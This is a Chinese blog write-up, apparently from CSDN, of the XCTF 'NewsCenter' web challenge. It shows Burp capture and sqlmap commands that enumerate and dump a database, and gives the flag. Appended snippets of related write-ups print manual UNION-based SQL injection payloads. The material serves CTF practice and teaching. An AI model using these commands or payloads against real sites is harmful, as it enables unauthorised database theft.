攻防世界WEB进阶之NewsCenter

最新推荐文章于 2024-06-12 21:10:39 发布
置顶 最新推荐文章于 2024-06-12 21:10:39 发布
阅读量3.8k 收藏 2
点赞数
分类专栏: 攻防世界 文章标签: 攻防世界 NewsCenter web 安全 进阶
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/harry_c/article/details/97614941
版权

攻防世界WEB进阶之NewsCenter

难度系数: 1星
题目来源: XCTF 4th-QCTF-2018
题目描述:暂无

第一步:描述

本题题目没有描述,所以直接开启场景,映入眼帘的是一个搜索框,所以我们应该自然想到可能存在着sql注入等问题,首先使用bp进行抓取索搜索时候的包。
在这里插入图片描述

第二步:操作

抓包之后,将包的header方数据存储,使用sqlmap对其进行扫描,使用的是
Python2 sqlmap.py -r post.txt --dbs (其中post.txt是保存的上图的抓包信息)
在这里插入图片描述

第三步:答案

找到了两个可以获取的库,我们使用命令将其显示出来
Python2 sqlmap.py -r post.txt -D news --dump
在这里插入图片描述
至此flag为:QCTF{sql_inJec7ion_ezzz}

Just_Do_Yite
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
去除cnewscenter弹窗_攻防世界 web进阶NewsCenter
weixin_39874379的博客
12-22 9244
攻防世界 web进阶NewsCenter解题首先我们打开网页,发现题目中只有一个搜索框,然后通过查看源代码等方式都无法获得任何有用的信息。所以题目肯定是从这个搜索框入手的,那么就首先抓包试试。抓到这样一些数据,但是经过尝试也没有什么办法获取信息,只发现了搜索使用的是post请求。最后想到了一般这样的搜索框可能会存在sql注入,所以及逆行尝试。但是由于手注的技术实在是太差了,就先用sqlmap来...
攻防世界web进阶区全讲解(超详细的哇)!!(持续更新)
wo41ge的博客
10-13 2445
进入题目链接 有登录 就可能有注册界面 url栏register.php 或者直接上御剑扫一下 同样发现注册界面 注册成功后 进行登录 跳转到了这个界面
NewsCenter
06-23
自己做的系统,运行没什么问题,页面不是很多,主要有有添加新闻、删除新闻、查看新闻、修改新闻等操作。是三层架构。
攻防世界 web进阶 NewsCenter
weixin_43345082的博客
06-12 1481
看到这道题没什么头绪,扫完之后没有什么有用的信息 只有一个输入,试试sql 首先判断列,1’ order by 3# 有3列 首先去爆库 1’ union select 1,2,database()# 库是news,继续爆表 看到一个secret_table,爆他的列 1’ union select 1,2,column_name from information_schema.colum...
攻防世界--lottery、ez_curl、ics-05
最新发布
qq_75120258的博客
06-12 1017
array()函数是用来创建一个PHP数组json_decode :对 JSON 格式的字符串进行解码,转换为 PHP 变量。
攻防世界_NewsCenter
Kobalos的博客
09-22 115
访问目标地址,发现是一个叫做黑客新闻的页面 随便输入了一下,发现是一个post传输的参数,并且明文传输,初步判断可能存在注入 加入一个单引号看一下,可以发现确实报错了 再在后面加入#试一下 可以发现确实是存在注入的,且第一个单引号闭合了输入逻辑,#注释掉了后面的单引号,试着找一下字段数吧 asd'union select 1,2,3 # 使用该语句时未报错,当数字为1或者1,2时报错,得出字段数为3 看页面回显发现,能够显示的位置为,二号位和三号位,之后可以在二号位和三号位输入执行语句
攻防世界 WEB NewsCenter
diepangan3893的博客
09-23 495
  前几天才发现攻防世界这个平台,真是相见恨晚,正愁没地方检验自己大学四年学安全的学习成果,于是沉浸于寻找flag,大概一天一到两题的进度(解完两题就学别的去了,尽管如此也挺慢的了)在解题的同时也总结了安全的方方面面,各种工具和用法、各种漏洞的判断和利用.....最近终于磕磕绊绊做完了web的新手练习,怀着兴奋又紧张的心情进了高手进阶,扑面而来就是两页题,选了1分里名字最直白的一个——N...
攻防世界web高阶2分题(NewsCenter
qq_45791542的博客
08-01 224
读题 发现是一个搜索框,觉得是个sql注入 随便输入什么,我这里输入aaa,然后抓包 PS:一定要抓搜索后的包 然后将抓到的包保存在桌面1.txt 然后用sqlmap注入 1、查找数据库 python sqlmap.py -r D:\360data\重要数据\桌面\1.txt --dbs 2、查找news下的表 python sqlmap.py -r D:\360data\重要数据\桌面\1.txt --tables -D news 3、建立可后台news库连接, 搜索所有的数据 pyt
攻防世界 web进阶笔记
weixin_43928140的博客
06-03 1855
0x02 NaNNaNNaNNaN-Batman 首先下载附件得到web100,用notepad++打开看下,是一些js乱码 我把源码贴到下面 <script>_='function $(){e=getEleById("c").value;length==16^be0f23233ace98aa$c7be9){tfls_aie}na_h0lnrg...
攻防世界-web进阶
楼阁de猫的博客
10-30 972
目录baby_webTraining-WWW-Robots baby_web 题目描述:想想初始页面是哪个 打开链接看到这个界面 这里有两种解法 法一:我们输入index.php ,就会立即跳转到1.php 那我们就对index.php抓包看看 在请求头看到flag:flag{very_baby_web} 法二:题目提示说初始界面,但是url后面会自动跳转到1.php,我们可以在控制台找到初始界面, 按F12进入控制台点开原始的网址就可以看到 Training-WWW-Robots 打开链接是这样一个
攻防世界XCTF:NewsCenter
末初的CSDN博客
03-06 409
这道题是一个非常简单的sql注入 ’ and 1=1#回显正常,’ and 1=2#回显不正常。即可判断存在sql注入。 接着查看,这张表有几个字段,'order by 3#正常,'order by 4#报错,判断存在3个字段。 联合查询,发现2,3这两个字段存在回显。 查询版本和当前连接的数据库 查询当前用户和所有数据库 查表名 查字段 获取字段内容 ...
攻防世界 Lottery web进阶高手区 详解
xmj818719的博客
04-16 2316
1多次尝试无果,想到了学爬虫时候的一个协议文件 robots.txt (本题已经给出了源码) 发现.git文件,应该存在github源码泄露 2 使用GitHack工具获取源码https://github.com/lijiejie/GitHack 3 工具会对源码自行下载,对源码进行审计 查看api.php(因为其他文件均为html页面前端文件) 看到buy这一函数,其比对彩票号码时用的是 == 双等于的弱类型比较 使用true可实现与数字的比较结果均为真 4 使用BP对买彩票
XCTF-4th-QCTF-2018-babyrsa
MangoFengC++
03-17 630
题目 Baby RSA e = 0x10001 n = 0x0b765daa79117afe1a77da7ff8122872bbcbddb322bb078fe0786dc40c9033fadd639adc48c3f2627fb7cb59bb0658707fe516967464439bdec2d6479fa3745f57c0a5ca255812f0884978b2a8aaeb750e0228cbe28a1e5a63bf0309b32a577eecea66f7610a9a4e720649129e9dc2115d
攻防世界(高手进阶区)——NewsCenter
知足且坚定,温柔且上进
02-11 2147
御剑扫一下,发现有robots.txt与config.php,不过是个空白页面;放弃。 用burpsuite抓包,: 尝试xff,无果,直接sql注入,利用sqlmap. 将Request中的Raw内容拷贝到一个txt文档,用sqlmap爆。(注意将文档拷贝到sqlmap文件所在位置) sqlmap.py -r flag.txt --dbs 发现两个包,分别尝试,只有news有: sqlm...
攻防世界web进阶news center
gongjingege的博客
07-11 371
burp suite抓包,sqlmap注入 打开链接 有一个搜索框,随意输入写数字,没有变化,用bp抓包试一下,也没有发现,看了看大佬的wp,才知道考sql注入。。。。 看了下是post,所以然后保存在桌面,123.txt 然后用sqlmap注入(这方面我也不太会。。。) 1,查找数据库 -r C:\Users\123\Desktop\123.txt --dbs 发现有两个数据库 推测应该是news 2,查找news下的表 -r C:\Users\123\Desktop\123.txt --
攻防世界NewsCenter
qq_58970968的博客
11-13 3267
1,sqlmap注入; 将抓包后的请求报文复制粘贴为TXT文件,用sqlmap命令打开: sqlmap -r D:\\桌面\1.txt --dbs 会发现有两个数据库 sqlmap -r D:\\桌面\1.txt -Dnews --dump可看到news里面的所有表中的详细内容; 当然可以直接--dump暴力 2,sql注入 ...
攻防世界NewsCenter
金 帛的博客
04-09 2491
攻防世界WP
攻防世界 newscenter
09-08
攻防世界NewsCenter是一个基于React构建的前端应用程序,它提供了实时版本的背景和概述,展示了当前主流媒体如何报道当下的主题。你可以通过查看CNN、Fox News、NBC、NYTimes和Huffington Post主页上的精选文章来了解更多信息。此外,NewsCenter还涉及到CTF(Capture The Flag)比赛和SQL注入攻击的内容。在这个应用程序中,有两个表,分别是news和secret_table,我们需要从secret_table表中找到flag(标志)。通过构造SQL语句,并利用搜索(search)功能,我们可以使用union select和group_concat函数来获取所需的信息。最后,通过执行以下SQL语句search=-1' union select 1,version(),group_concat(fl4g) from secret_table --,我们可以得到flag的值为QCTF{sq1_inJec7ion_ezzz}。这是一个CTF比赛中的一个关卡,攻防世界NewsCenter也是为了帮助新手了解和学习Web安全而创建的。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值